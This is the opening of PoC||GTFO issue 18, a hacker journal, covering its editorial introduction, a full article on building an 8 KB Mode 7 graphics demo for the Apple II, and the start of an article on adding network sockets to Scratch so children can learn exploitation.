
PoC||GTFO

Proof of Concept or Get the Fuck Out

Pastor Manul Laphroaig’s


Montessori Soldering School and
Stack Smashing Academy
for Youngsters Gifted and Not


Рукописи не горят. pocorgtfo18.pdf. Compiled on June 23, 2018.


Application Fee: 0, $0 USD, $0 AUD, 0 RSD, 0 SEK, $50 CAD, 6 × 10²⁹ Pengő (3 × 10⁸ Adópengő), 100 JPC.
18:02 An 8 Kilobyte Mode 7 Demo for the Apple II (p. 4)
18:03 Fun Memory Corruption Exploits for Kids with Scratch! (p. 10)
18:04 Concealing ZIP Files in NES Cartridges (p. 17)
18:05 House of Fun; or, Heap Exploitation against GlibC in 2018 (p. 22)
18:06 Read Only Relocations for Static ELF (p. 37)
18:07 Remotely Exploiting a TetriNET Server (p. 48)
18:08 A Guide to KLEE LLVM Execution Engine Internals (p. 51)
18:09 Reversing the Sandy Bridge DDR3 Scrambler with Coreboot (p. 58)
18:10 Easy SHA-1 Colliding PDFs with PDFLaTeX (p. 63)

Legal Note: Printing this to hardcopy prevents the electronic edition from smelling like burning paper.
We’ll be printing a few thousand of our own, but we also insist that you print it by laserjet or typewriter
самиздат, giving it away to friends and strangers. Sneak it into a food delivery rack at your local dive bar,
or hide it between two books on the shelves of your university library.

Reprints: Bitrot will burn libraries with merciless indignity that even Pets Dot Com didn’t deserve. Please
mirror—don’t merely link!—pocorgtfo18.pdf and our other issues far and wide, so our articles can help fight
the coming flame deluge. Not running one of our own, we like the following mirrors.

https://unpack.debug.su/pocorgtfo/ https://pocorgtfo.hacke.rs/
https://www.alchemistowl.org/pocorgtfo/ https://www.sultanik.com/pocorgtfo/

Technical Note: This file, pocorgtfo18.pdf, is valid as a PDF, ZIP, and HTML. It is available in two
different variants, but they have the same SHA-1 hash.

Printing Instructions: Pirate print runs of this journal are most welcome! PoC||GTFO is to be printed
duplex, then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11" x 17") paper
in Samland, then fold to get a booklet in A4 or Letter size. Secret volcano labs in Canada may use P3
(280 mm x 430 mm) if they like, folded to make P4. The outermost sheet should be on thicker paper to
form a cover.
# This is how to convert an issue for duplex printing.
sudo apt-get install pdfjam
pdfbook --short-edge --vanilla --paper a3paper pocorgtfo18.pdf -o pocorgtfo18-book.pdf

Man of The Book Manul Laphroaig


Editor of Last Resort Melilot
TEXnician Evan Sultanik
Editorial Whipping Boy Jacob Torrey
Funky File Supervisor Ange Albertini
Assistant Scenic Designer Philippe Teuwen
Scooby Bus Driver Ryan Speers
with the good assistance of
Virtual Machine Mechanic Dan Kaminsky

18:01 I thought I turned it on, but I didn’t.
Neighbors, please join me in reading this nineteenth release of the International Journal of Proof of Concept or Get the Fuck Out, a friendly little collection of articles for ladies and gentlemen of distinguished ability and taste in the field of reverse engineering and the study of weird machines. This release is a gift to our fine neighbors in Montréal.

If you are missing the first eighteen issues, we suggest asking a neighbor who picked up a copy of the first in Vegas, the second in São Paulo, the third in Hamburg, the fourth in Heidelberg, the fifth in Montréal, the sixth in Las Vegas, the seventh from his parents' inkjet printer during the Thanksgiving holiday, the eighth in Heidelberg, the ninth in Montréal, the tenth in Novi Sad or Stockholm, the eleventh in Washington D.C., the twelfth in Heidelberg, the thirteenth in Montréal, the fourteenth in São Paulo, San Diego, or Budapest, the fifteenth in Canberra, Heidelberg, or Miami, the sixteenth release in Montréal, New York, or Las Vegas, the seventeenth release in São Paulo or Budapest, or the eighteenth release in Leipzig or Washington, D.C. Two collected volumes are available through No Starch Press, wherever fine books are sold.

After our paper release, and only when quality control has been passed, we will make an electronic release named pocorgtfo18.pdf. It is a valid PDF document, HTML website, and ZIP archive filled with fancy papers and source code. You will find it available in two different variants, but they have the same SHA-1 hash.

Nintendo's SNES platform was famous for its Mode 7, a video mode in which a background image could be rotated and stretched to create a faux 3D effect. This didn't exist for the Apple ][, so on page 4 Vincent Weaver describes his recreation of the technique in software as a recent demo coding exercise.

Many of us began our careers in reverse engineering through line-numbered BASIC, and we fondly remember the peek and poke commands that let us do sophisticated things with a child's language. On page 10, Kev Sheldrake extends the Scratch language so that his son can experiment with memory corruption exploits.

Vi Grey was reading PoC||GTFO 14:12, and a nifty thought occurred. Why not merge a ZIP file into an NES cartridge itself, and not just its iNES emulator file? See page 17 for all the practical details.

If you enjoyed Yannay Livneh's article on the VLC heap from PoC||GTFO 16:6, turn to page 22 for his notes on the House of Fun, exploiting glibc heaps in the year 2018.

Ryan O'Neill, whom you might know as Elfmaster, has been playing around with static linking of ELF files on Linux. You certainly know that static files are handy for avoiding missing libraries, but did you know that static linking breaks ASLR and RELRO defenses, that the global offset table might still be writable? See page 37 for his notes on producing a static executable that does include these defenses.

TetriNET is a multiplayer clone of Tetris that St0rmCat released in 1997. On page 48, John Laky and Kyle Hanslovan give us a remote code execution exploit for that game just twenty years too late for anyone to expect a patch.

When performing a cold boot attack, it's important to recover not just the contents of memory but also to descramble it, and this scrambler is often poorly documented on modern systems. On page 58, Nico Heijningen patches Coreboot to reverse engineer the scrambler of the DDR3 controller on Intel's Sandy Bridge processors.

Ange Albertini was one of the fine authors of the SHAttered attack that demonstrated a practical SHA-1 collision. On page 63, he shows how to reuse that same colliding block to substitute an arbitrary image in a larger document, conveniently generated by PDFLaTeX. As is the tradition in most of Ange's articles, pocorgtfo18.pdf uses this technique to place a stamp on the front cover. We'll release two variants, but because they have the same SHA-1 hash, we politely ask mirrors to include the MD5 hashes as well.

On page 64, the last page, we pass around the collection plate. Our church has no interest in bitcoins or wooden nickels, but we'd love your donation of a reverse engineering story. Please send some our way.

18:02 An 8 Kilobyte Mode 7 Demo for the Apple II
by Vincent M. Weaver

While making an inside-joke filled game for my favorite machine, the Apple ][, I needed to create a Final-Fantasy-esque flying-over-the-planet sequence. I was originally going to fake this, but why fake graphics when you can laboriously spend weeks implementing the effect for real? It turns out the Apple ][ is just barely capable of generating the effect in real time.

Once I got the code working I realized it would be great as part of a graphical demo, so off on that tangent I went. This turned out well, despite the fact that all I knew about the demoscene I had learned from a few viewings of the Future Crew Second Reality demo combined with dimly remembered Commodore 64 and Amiga usenet flamewars.

While I hope you enjoy the description of the demo and the work that went into it, I suspect this whole enterprise is primarily of note due to the dearth of demos for the Apple ][ platform. For those of you who would like to see a truly impressive Apple ][ demo, I would like to make a shout out to FrenchTouch whose works put this one to shame.

The Hardware

CPU, RAM and Storage:
The Apple ][ was introduced in 1977 with a 6502 processor running at roughly 1.023MHz. Early models only shipped with 4k of RAM, but in later years, 48k, 64k and 128k systems became common. While the demo itself fits in 8k, it decompresses to a larger size and uses a full 48k of RAM; this would have been very expensive in the seventies.

In 1977 you would probably be loading this from cassette tape, as it would be another year before Woz's single-sided 5¼" Disk II came around. With the release of Apple DOS 3.3 in 1980, it offered 140k of storage on each side.

Sound:
The only sound available in a stock Apple ][ is a bit-banged speaker. There is no timer interrupt; if you want music, you have to cycle-count via the CPU to get the waveforms you need.

The demo uses a Mockingboard soundcard, first introduced in 1981. This board contains dual AY-3-8910 sound generation chips connected via 6522 I/O chips. Each sound chip provides three channels of square waves as well as noise and envelope effects.

Graphics:
It is hard to imagine now, but the Apple ][ had nice graphics for its time. Compared to later competitors, however, it had some limitations: No hardware sprites, user-defined character sets, blanking interrupts, palette selection, hardware scrolling, or even a linear framebuffer! It did have hardware page flipping, at least.

The hi-res graphics mode is a complex mess of NTSC hacks by Woz. You get approximately 280x192 resolution, with 6 colors available. The colors are NTSC artifacts with limitations on which colors can be next to each other, in blocks of 3.5 pixels. There is plenty of fringing on edges, and colors change depending on whether they are drawn at odd or even locations. To add to the madness, the framebuffer is interleaved in a complex way, and pixels are drawn least-significant-bit first. (All of this to make DRAM refresh better and to shave a few 7400 series logic chips from the design.) You do get two pages of graphics, Page 1 is at $2000 and Page 2 at $4000.1 Optionally four lines of text can be shown at the bottom of the screen instead of graphics.

The lo-res mode is a bit easier to use. It provides 40 × 48 blocks, reusing the same memory as the 40 × 24 text mode. (As with hi-res you can switch to a 40 × 40 mode with four lines of text displayed at the bottom.) Fifteen unique colors are available, plus a second shade of grey. Again the addresses are interleaved in a non-linear fashion. Lo-res Page 1 is at $400 and Page 2 is at $800.

Some amazing effects can be achieved by cycle counting, reading the floating bus, and racing the beam while toggling graphics modes on the fly.
1 On 6502 systems hexadecimal values are traditionally indicated by a dollar sign.
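To make the lo-res interleaving concrete, here is a minimal Python sketch (not taken from the demo's 6502 source) that maps a block coordinate to a byte address. The row formula is the standard Apple ][ text/lo-res layout; the function names are made up for illustration, and the sketch assumes the usual convention that the low nybble of each byte holds the upper of the two stacked blocks.

```python
LORES_PAGE1 = 0x400  # lo-res Page 1 base address, as given in the text
LORES_PAGE2 = 0x800  # lo-res Page 2 base address


def lores_row_address(text_row, base=LORES_PAGE1):
    """Address of the first byte of one 40-byte text row (0..23)."""
    if not 0 <= text_row < 24:
        raise ValueError("text_row must be in 0..23")
    # Rows are grouped in threes inside 128-byte chunks, hence the interleave.
    return base + (text_row % 8) * 0x80 + (text_row // 8) * 0x28


def lores_block_location(x, y, base=LORES_PAGE1):
    """Return (address, uses_high_nybble) for block (x, y) on the 40 x 48 grid."""
    if not (0 <= x < 40 and 0 <= y < 48):
        raise ValueError("block coordinate out of range")
    # Two vertically stacked blocks share one byte of text memory.
    return lores_row_address(y // 2, base) + x, bool(y % 2)


def plot(memory, x, y, color, base=LORES_PAGE1):
    """Set one lo-res block in a bytearray standing in for Apple ][ RAM."""
    address, high = lores_block_location(x, y, base)
    if high:
        memory[address] = (memory[address] & 0x0F) | ((color & 0x0F) << 4)
    else:
        memory[address] = (memory[address] & 0xF0) | (color & 0x0F)
```

Enumerating every displayed byte with `lores_row_address` touches 960 distinct addresses inside the 1k page, so 64 bytes of each page are never shown on screen.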

Development Toolchain
I do all of my coding under Linux, using the ca65 assembler from the cc65 project. I cross-compile the code, constructing Apple DOS 3.3 disk images using custom tools I have written. I test first in emulation, where AppleWin under Wine is the easiest to use, but until recently MESS/MAME had cleaner sound.

Once the code appears to work, I put it on a USB stick and transfer to actual hardware using a CFFA3000 disk emulator installed in an Apple IIe platinum edition.

------------- $ffff
| ROM/IO      |
------------- $c000
|             |
| Uncompressed|
| Code/Data   |
|             |
------------- $4000
| Compressed  |
| Code        |
------------- $2000
| free        |
------------- $1c00
| Scroll      |
| Data        |
------------- $1800
| Multiply    |
| Tables      |
------------- $1000
| LORES pg 3  |
------------- $0c00
| LORES pg 2  |
------------- $0800
| LORES pg 1  |
------------- $0400
|free/vectors |
------------- $0200
| stack       |
------------- $0100
| zero pg     |
------------- $0000

Figure 2. Memory Map

Figure 1. Colorful View of Executable Code

Bootloader

An Applesoft BASIC "HELLO" program loads the binary automatically at bootup. This does not count towards the executable size, as you could manually BRUN the 8k machine-language program if you wanted.

To make the loading time slightly more interesting the HELLO program enables graphics mode and loads the program to address $2000 (hi-res Page 1). This causes the display to be filled with the colorful pattern corresponding to the compressed image. (Figure 1.) This conveniently fills all 8k of the display RAM, or would have if we had poked the right soft-switch to turn off the bottom four lines of text. After loading, execution starts at address $2000.

Decompression

The binary is encoded with the LZ4 algorithm. We flip to hi-res Page 2 and decompress to this region so the display now shows the executable code.

The 6502 size-optimized LZ4 decompression code was written by qkumba (Peter Ferrie).2 The program and data decompress to around 22k starting at $4000. This overwrites parts of DOS 3.3, but since we are done with the disk this is no problem.

If you look carefully at the upper left corner of the screen during decompression you will see my triangular logo, which is supposed to evoke my VMW initials. To do this I had to put the proper bit pattern inside the code at the interleaved addresses of $4000, $4400, $4800, and $4C00. The image data at $4000 maps to (mostly) harmless code so it is left in place and executed.
2 http://pferrie.host22.com/misc/appleii.htm
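The four logo addresses are simply the first four scanlines of hi-res Page 2. As a rough illustration (a Python sketch, not the demo's own code), the standard hi-res row interleave can be written as below; the function name is hypothetical, and only the page base addresses come from the article.

```python
HIRES_PAGE1 = 0x2000  # hi-res Page 1 base address, as given in the text
HIRES_PAGE2 = 0x4000  # hi-res Page 2 base address


def hires_row_address(y, base=HIRES_PAGE1):
    """Address of the leftmost byte of hi-res scanline y (0..191)."""
    if not 0 <= y < 192:
        raise ValueError("y must be in 0..191")
    return (base
            + (y % 8) * 0x400         # line within an 8-line character cell
            + ((y // 8) % 8) * 0x80   # cell row within a group of 64 lines
            + (y // 64) * 0x28)       # which third of the screen


if __name__ == "__main__":
    # The top four scanlines of Page 2, where the logo bit pattern lives.
    print([hex(hires_row_address(y, HIRES_PAGE2)) for y in range(4)])
```

Consecutive scanlines sit $400 bytes apart, which is why a small image in the corner of the screen has to be scattered through the code rather than stored as one contiguous blob.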

Optimizing the code inside of a compressed image (to fit in 8k) is much more complicated than regular size optimization. Removing instructions sometimes makes the binary larger as it no longer compresses as well. Long runs of a single value, such as zero padding, are essentially free. This became an exercise of repeatedly guessing and checking, until everything fit.

Title Screen

Once decompression is done, execution continues at address $4000. We switch to lo-res mode for the rest of the demo.

FADE EFFECT: The title screen fades in from black, which is a software hack as the Apple ][ does not have palette support. This is done by loading the image to an off-screen buffer and then a lookup table is used to copy in the faded versions to the image buffer on the fly.

TITLE GRAPHICS: The title screen is shown in Figure 3. The image is run-length encoded (RLE) which is probably unnecessary in light of it being further LZ4 encoded. (LZ4 compression was a late addition to this endeavor.)

Figure 3. The title screen.

Why not save some space and just load our demo at $400, negating the need to copy the image in place? Remember the graphics are 40 × 48 (shared with the text display region). It might be easier to think of it as 40 × 24 characters, with the top / bottom nybbles of each ASCII character being interpreted as colors for a half-height block. If you do the math you will find this takes 960 bytes of space, but the memory map reserves 1k for this mode. There are "holes" in the address range that are not displayed, and various pieces of hardware can use these as scratchpad memory. This means just overwriting the whole 1k with data might not work out well unless you know what you are doing. Our RLE decompression code skips the holes just to be safe.

SCROLL TEXT: The title screen has scrolling text at the bottom. This is nothing fancy, the text is in a buffer off screen and a 40 × 4 chunk of RAM is copied in every so many cycles.

You might notice that there is tearing/jitter in the scrolling even though we are double-buffering the graphics. Sadly there is no reliable cross-platform way to get the VBLANK info on Apple ][ machines, especially the older models.

Mockingboard Music

No demo is complete without some exciting background music. I like chiptune music, especially the kind written for AY-3-8910 based systems. During the long wait for my Mockingboard hardware to arrive, I designed and built a Raspberry Pi chiptune player that uses essentially the same hardware. This allowed me to build up some expertise with the software/hardware interface in advance.

The song being played is a stripped down and re-arranged version of "Electric Wave" from CC'00 by EA (Ilya Abrosimov).

Most of my sound infrastructure involves YM5 files, a format commonly used by ZX Spectrum and Atari ST users. The YM file format is just AY-3-8910 register dumps taken at 50Hz. To play these back one sets up the sound card to interrupt 50 times a second and then writes out the fourteen register values from each frame in an interrupt handler.

Writing out the registers quickly enough is a challenge on the Apple ][, as for each register you have to do a handshake and then set both the register number and the value. It is hard to do this in less than forty 1MHz cycles for each register. With complex chiptune files (especially those written on an ST with much faster hardware), sometimes it is not possible to get exact playback due to the delay. Further slowdown happens as you want to write both AY chips (the output is stereo, with one AY on the left and one on the right). To help with latency on playback, we keep track of the last frame written and only write to the registers that have changed.

The demo detects the Mockingboard in Slot 4
at startup. First the board is initialized, then one of the 6522 timers is set to interrupt at 25Hz. Why 25Hz and not 50Hz? At 50Hz with fourteen registers you use 700 bytes/s. So a two minute song would take 84k of RAM, which is much more than is available! To allow the song to fit in memory, without a fancy circular buffer decompression routine, we have to reduce the size.3

3 For an example of such a routine, see my Chiptune music-disk demo.

First the music is changed so it only needs to be updated at 25Hz, and then the register data is compressed from fourteen bytes to eleven bytes by stripping off the envelope effects and packing together fields that have unused bits. In the end the sound quality suffered a bit, but we were able to fit an acceptably catchy chiptune inside of our 8k payload.

Drawing the Mode7 Background

Mode 7 is a Super Nintendo (SNES) graphics mode that takes a tiled background and transforms it by rotating and scaling. The most common effect squashes the background out to the horizon, giving a three-dimensional look. The SNES did these transforms in hardware, but our demo must do them in software.

Our algorithm is based on code by Martijn van Iersel which iterates through each horizontal line on the screen and calculates the color to output based on the camera height (spacez) and angle as well as the current coordinates, x and y.

First, the distance d is calculated based on fixed scale and distance-to-horizon factors. Instead of a costly division operation, we use a pre-generated lookup table for this.

\[ d = \frac{z \times yscale}{y + horizon} \]

Next we calculate the horizontal scale (distance between points on this line):

\[ h = \frac{d}{xscale} \]

Then we calculate delta x and delta y values between each block on the line. We use a pre-computed sine/cosine lookup table.

\[ \Delta x = -\sin(angle) \times h \]
\[ \Delta y = \cos(angle) \times h \]

The leftmost position in the tile lookup is calculated:

\[ tilex = x + d\cos(angle) - \frac{width}{2}\,\Delta x \]
\[ tiley = y + d\sin(angle) - \frac{width}{2}\,\Delta y \]

Then an inner loop happens that adds ∆x and ∆y as we look up the color from the tilemap (just a wrap-around array lookup) for each block on the line.

color = tilelookup(tilex, tiley)
plot(x, y)
tilex += ∆x, tiley += ∆y

Optimizations: The 6502 processor cannot do floating point, so all of our routines use 8.8 fixed point math. We eliminate all use of division, and convert as much as possible to table lookups, which involves limiting the heights and angles a bit.

Some cycles are also saved by using self-modifying code, most notably hard-coding the height (z) value and modifying the code whenever this is changed. The code started out only capable of roughly 4.9fps in 40 × 20 resolution and in the end we improved this to 5.7fps in 40 × 40 resolution. Care was taken to optimize the innermost loop, as every cycle saved there results in 1280 cycles saved overall.

Fast Multiply: One of the biggest bottlenecks in the mode7 code was the multiply. Even our optimized algorithm calls for at least seven 16-bit by 16-bit to 32-bit multiplies, something that is really slow on the 6502. A typical implementation takes around 700 cycles for an 8.8 × 8.8 fixed point multiply.

We improved this by using the ancient quarter-square multiply algorithm, first described for 6502 use by Stephen Judd.

This works by noting these factorizations:

\[ (a + b)^2 = a^2 + 2ab + b^2 \]
\[ (a - b)^2 = a^2 - 2ab + b^2 \]

If you subtract these you can simplify to

\[ a \times b = \frac{(a + b)^2}{4} - \frac{(a - b)^2}{4} \]
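The identity is easy to check in a few lines of Python. The sketch below is an illustration rather than the demo's 6502 routine: it stores floor(n²/4) in one table (real 6502 code would typically split this into low-byte and high-byte tables), and the helper names `mul8` and `mul_8_8` are invented here. Flooring is harmless because a + b and a − b always have the same parity, so the discarded fractions cancel.

```python
# floor(n*n / 4) for n = 0..510, enough for any sum of two 8-bit values.
QUARTER_SQUARES = [(n * n) // 4 for n in range(511)]


def mul8(a, b):
    """Unsigned 8-bit x 8-bit multiply: two table lookups and a subtraction."""
    if not (0 <= a <= 255 and 0 <= b <= 255):
        raise ValueError("operands must be 8-bit")
    return QUARTER_SQUARES[a + b] - QUARTER_SQUARES[abs(a - b)]


def mul_8_8(a, b):
    """Unsigned 8.8 fixed point multiply assembled from four 8x8 products."""
    a_hi, a_lo = a >> 8, a & 0xFF
    b_hi, b_lo = b >> 8, b & 0xFF
    product = ((mul8(a_hi, b_hi) << 16)
               + ((mul8(a_hi, b_lo) + mul8(a_lo, b_hi)) << 8)
               + mul8(a_lo, b_lo))          # 16.16 intermediate result
    return (product >> 8) & 0xFFFF          # back to 8.8, overflow dropped


if __name__ == "__main__":
    # 1.5 * 2.0 in 8.8 fixed point
    print(hex(mul_8_8(0x0180, 0x0200)))
```

Signed operands, which the demo's sine and cosine values would need, are left out of this sketch.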

For 8-bit values if you create a table of squares from 0 to 511, then you can convert a multiply into two table lookups and a subtraction.4 This does have the downside of requiring two kilobytes of lookup tables, but it reduces the multiply cost to the order of 250 cycles or so and these tables can be generated at startup.

BALL ON CHECKERBOARD

The first Mode7 scene transpires on an infinite checkerboard. A demo would be incomplete without some sort of bouncing geometric solid; in this case we have a pink sphere. The sphere is represented by sixteen sprites that were captured from a twenty-year-old OpenGL example. Screenshots were reduced to the proper size and color limitations. The shadows are also sprites, and as the Apple ][ has no dedicated sprite hardware, these are drawn completely in software.

The clicking noise on bounce is generated by accessing the speaker port at address $C030. This gives some sound for those viewing the demo without the benefit of a Mockingboard.

Figure 4. Bouncing ball on infinite checkerboard.

TFV SPACESHIP FLYING

This next scene has a spaceship flying over an island. The Mode7 graphics code is generic enough that only one copy of the code is needed to generate both the checkerboard and island scenes. The spaceship, water splash, and shadows are all sprites. The path the ship takes is pre-recorded; this is adapted from the Talbot Fantasy 7 game engine with the keyboard code replaced by a hard-coded script of actions to take.

Figure 5. Spaceship flying over an island.
4 All 8-bit a + b and a − b fall in this range.
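The per-scanline Mode 7 loop shared by the checkerboard and island scenes can be sketched in Python as follows. This is a floating-point illustration of the formulas from the background-drawing section, not the demo's 8.8 fixed point, table-driven 6502 code. It assumes that the y in the distance formula is the screen row, and the default `horizon`, `xscale`, and `yscale` values are arbitrary placeholders rather than the demo's constants.

```python
import math


def render_mode7(tilemap, cam_x, cam_y, cam_z, angle,
                 width=40, rows=40, horizon=4.0, xscale=16.0, yscale=8.0):
    """Return `rows` lists of `width` colors sampled from a wrap-around tilemap."""
    map_h, map_w = len(tilemap), len(tilemap[0])
    sin_a, cos_a = math.sin(angle), math.cos(angle)
    frame = []
    for row in range(rows):
        d = (cam_z * yscale) / (row + horizon)   # distance for this line
        h = d / xscale                           # spacing between blocks
        dx = -sin_a * h
        dy = cos_a * h
        # Leftmost sample position on this line.
        tile_x = cam_x + d * cos_a - (width / 2) * dx
        tile_y = cam_y + d * sin_a - (width / 2) * dy
        line = []
        for _ in range(width):
            # Wrap-around array lookup, as in the article's inner loop.
            line.append(tilemap[math.floor(tile_y) % map_h][math.floor(tile_x) % map_w])
            tile_x += dx
            tile_y += dy
        frame.append(line)
    return frame


if __name__ == "__main__":
    checker = [[(x + y) % 2 for x in range(8)] for y in range(8)]
    for line in render_mode7(checker, 0.0, 0.0, 4.0, 0.3, rows=8):
        print("".join("#" if c else "." for c in line))
```

Swapping in a different `tilemap` is all it takes to change scenes, which matches the article's point that one copy of the routine serves both.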

STARFIELD

The spaceship now takes to the stars. This is typical starfield code, where on each iteration the x and y values are changed by

\[ \Delta x = \frac{x}{z}, \qquad \Delta y = \frac{y}{z} \]

In order to get a good frame rate and not clutter the lo-res screen only sixteen stars are modeled. To avoid having to divide, the reciprocal of all possible z values are stored in a table, and the fast-multiply routine described previously is used.

Figure 6. Spaceship with starfield.

The star positions require random number generation, but there is no easy way to quickly get random data on the Apple ][. Originally we had a 256-byte blob of pre-generated "random" values included in the code. This wasted space, so instead we use our own machine code at address $5000 as if it were a block of random numbers!

A simple state machine controls star speed, ship movement, hyperspace, background color (for the blue flash) and the eventual sequence of sprites as the ship vanishes into the distance.

RASTERBARS/CREDITS

Once the ship has departed, it is time to run the credits as the stars continue to fly by.

The text is written to the bottom four lines of the screen, seemingly surrounded by graphics blocks. Mixed graphics/text is generally not possible on the Apple ][, although with careful cycle counting and mode switching groups such as FrenchTouch have achieved this effect. What we see in this demo is the use of inverse-mode (inverted color) space characters which appear the same as white graphics blocks.

The rasterbar effect is not really rasterbars, just a colorful assortment of horizontal lines drawn at a location determined with a sine lookup table. Horizontal lines can take a surprising amount of time to draw, but these were optimized using inlining and a few other tricks.

Figure 7. Rasterbars, stars, and credits.

The spinning text is done by just rapidly rotating the output string through the ASCII table, with the clicking effect again generated by hitting the speaker at address $C030. The list of people to thank ended up being the primary limitation to fitting in 8kB, as unique text strings do not compress well. I apologize to everyone whose moniker got compressed beyond recognition, and I am still not totally happy with the centering of the text.

A Parting Gift

Further details, a prebuilt disk image, and full source code are available both online and attached to the electronic version of this document.5 6

5 unzip pocorgtfo18.pdf mode7.tar.gz


6 http://www.deater.net/weave/vmwprod/mode7_demo/

18:03 Fun Memory Corruption Exploits for Kids with Scratch!
by Kev Sheldrake

Introduction
When my son graduated from Scratch Junior on the iPad to full-blown Scratch on a desktop computer, I opted to protect the Internet from him by not giving him a network interface. Instead I installed the offline version of Scratch on his computer that works completely stand-alone. One of the interesting differences between the online and offline versions of Scratch is the way in which it can be extended; the offline version will happily provide an option to install an 'Experimental HTTP Extension' if you use the super-secret 'shift click' on the File menu instead of the regular, common-or-garden 'click'.

These extensions allow Scratch to communicate with another process outside the sandbox through a web service; there is an abandoned Python module that provides a suitable framework for building them. While words like 'experimental' and 'abandoned' don't appear to offer much hope, this is all just a facade and the technology actually works pretty well. Indeed, we have interfaced Scratch to MIDI, Arduino projects and, as this essay will explain, TCP/IP network sockets because, well, if a language exists to teach kids how to code then I think it [c|sh]ould also be used to teach them how to hack.

Scratch Basics

If you're not already aware, Scratch is an IDE and a language, all wrapped up in a sandbox built out of Squeak/Smalltalk (v1.0 to v1.4), Flash/Adobe Air (v2.0) and HTML5/JavaScript (v3.0). Within it, sprite-based programs can be written using primitives that resemble jigsaw pieces that constrain where or how they can be placed. For example, an IF/THEN primitive requires a predicate operator, such as X=Y or X>Y; in Scratch, predicates have angled edges and only fit in places where predicates are accepted. This makes it easier for children to learn how to combine primitives to make statements and eventually programs.

All code lives behind sprites or the stage (background); it can sense key presses, mouse clicks, sprites touching, etc, and can move sprites and change their size, colour, etc. If you ever wanted to recreate that crappy flash game you played in the late 90s at university or in your first job then Scratch is perfect for that. You could probably get something that looks suitably pro within an afternoon or less. Don't be fooled by the fact it was made for kids, Scratch can make some pretty cool things and is fun; but also be aware that it has its limitations, and lack of networking is one of them.

The offline version of Scratch relies on Adobe Air which has been abandoned on Linux. An older 32-bit version can be installed, but you'll have much better results if you just try this on Windows or MacOS.

Scratch Extensions

Extensions were introduced in Scratch v2.0 and differ between the online and offline versions. For the online version extensions are coded in JS, stored on github.io and accessed via the ScratchX version of Scratch. As I had limited my son to the offline version, we were treated to web service extensions built in Python.

On the face of it a web service seems like an obvious choice because they are easy to build, are asynchronous by nature and each method can take multiple arguments. In reality, this extension model was actually designed for controlling things like robot arms rather than anything generic. There are commands and reporters, each represented in Scratch as appropriate blocks; commands would move robot motors and reporters would indicate when motor limits are hit. To put these concepts into more standard terms, commands are essentially procedures.
They take arguments but provide no responses, and reporters are essentially global variables that can be affected by the procedures. If you think this is a weird model to program in then you'd be correct.

In order to quickly and easily build a suitable web service, we can use the off-the-shelf abandonware, Blockext.7 This is a Python module that provides the full web service functionality to an object that we supply. It's relatively trivial to build methods that create sockets, write to sockets, and close sockets, as we can get away without return values. To implement methods that read from sockets we need to build a command (procedure) that does the actual read, but puts the data into a global variable that can be read via a reporter.
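The command/reporter split can be illustrated without any web service at all. The following Python 3 sketch deliberately does not use the Blockext API; `SocketBridge`, `read_socket`, and `read_result` are hypothetical names chosen only to show a command that returns nothing and a reporter that exposes the stored result.

```python
import socket


class SocketBridge:
    """Toy stand-in for the object an extension framework would wrap."""

    def __init__(self):
        self.sockets = {}     # name -> socket object
        self.last_read = ""   # the "global variable" a reporter exposes

    def add(self, name, sock):
        self.sockets[name] = sock

    def read_socket(self, name, max_bytes=1024):
        """Command: performs the read but returns nothing to the caller."""
        data = self.sockets[name].recv(max_bytes)
        # latin-1 maps every byte to one character, so nothing is lost.
        self.last_read = data.decode("latin-1")

    def read_result(self):
        """Reporter: hands back whatever the last read command stored."""
        return self.last_read


if __name__ == "__main__":
    left, right = socket.socketpair()
    bridge = SocketBridge()
    bridge.add("demo", left)
    right.sendall(b"hello")
    bridge.read_socket("demo")     # command, no return value
    print(bridge.read_result())    # reporter
    left.close()
    right.close()
```

Because the result lives in shared state, two reads in quick succession overwrite each other, so callers have to consume the reporter value before issuing the next command.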
At this point it is worth discussing how these reporters / global variables actually function. They are exposed via the web service by simply reporting their values thirty times a second. That's right, thirty times a second. This makes them great for motor limit switches where data is minimal but latency is critical, but less great at returning data from sockets. Still, as my hacky extension shows, if their use is limited they can still work. The blockext console doesn't log reporter accesses but a web proxy can show them happening if you're interested in seeing them.
7 git clone https://github.com/blockext/blockext

Scratch Limitations
While Scratch can handle binary data, it doesn't really have a way to input it, and certainly no C-style or Pythonesque formatting. It also has no complex data types; variables can be numbers or strings, but the language is probably Turing-complete so this shouldn't really stop us. There is also no random access into strings or any form of string slicing; we can however retrieve a single letter from a string by position.
Strings can be constructed from a series of joins, and we can write a Python handler to convert from an ASCIIfied format (such as '\xNN') to regular binary. Stripping off newlines on returned strings requires us to build a new (native) Scratch block. Just like the Python blocks accessible through the web service, these blocks are also procedures with no return values. We are therefore constrained to returning values via (sprite) global variables, which means we have to be careful about concurrency.
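A handler for the ASCIIfied format can be quite small. The sketch below is one possible Python 3 version, not the extension's actual code; the function names are made up, and it assumes that any character outside a `\xNN` escape is plain Latin-1 text that maps to a single byte.

```python
import re

# Matches a literal backslash, 'x', and exactly two hex digits.
_HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def asciified_to_bytes(text):
    """Convert a string such as 'AAAA\\x41\\x00' into raw bytes."""
    out = bytearray()
    pos = 0
    for match in _HEX_ESCAPE.finditer(text):
        out += text[pos:match.start()].encode("latin-1")  # literal run
        out.append(int(match.group(1), 16))               # escaped byte
        pos = match.end()
    out += text[pos:].encode("latin-1")
    return bytes(out)


def bytes_to_asciified(data):
    """Inverse direction: escape every byte so Scratch only sees ASCII."""
    return "".join("\\x%02x" % byte for byte in data)


if __name__ == "__main__":
    payload = asciified_to_bytes(r"AAAA\xef\xbe\xad\xde")
    print(payload)
    print(bytes_to_asciified(payload))
```

Escaping every byte on the way back is wasteful but keeps the Scratch side simple, since it only ever has to join fixed-width four-character chunks.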
Talking of concurrency, Scratch has a handy message system that can be used to create parallel processing. As highlighted, however, the lack of functions and local variables means we can easily run into problems if we're not careful.

Blockext
The Python blockext module can be obtained from its GitHub and installed with a simple sudo python setup.py install.

My socket extension is quite straightforward. The definition of the object is mostly standard socket code; while it has worked in my limited testing, feel free to make it more robust for any production use; this is just a PoC after all.

#!/usr/bin/python

from blockext import *
import socket
import select
import urllib
import base64

class SSocket:
    def __init__(self):
        self.sockets = {}

    def _on_reset(self):
        print 'reset!!!'
        for key in self.sockets.keys():
            if self.sockets[key]['socket']:
                self.sockets[key]['socket'].close()
        self.sockets = {}

    def add_socket(self, type, proto, sock, host, port):
        if self.is_connected(sock) or self.is_listening(sock):
            print 'add_socket: socket already in use'
            return
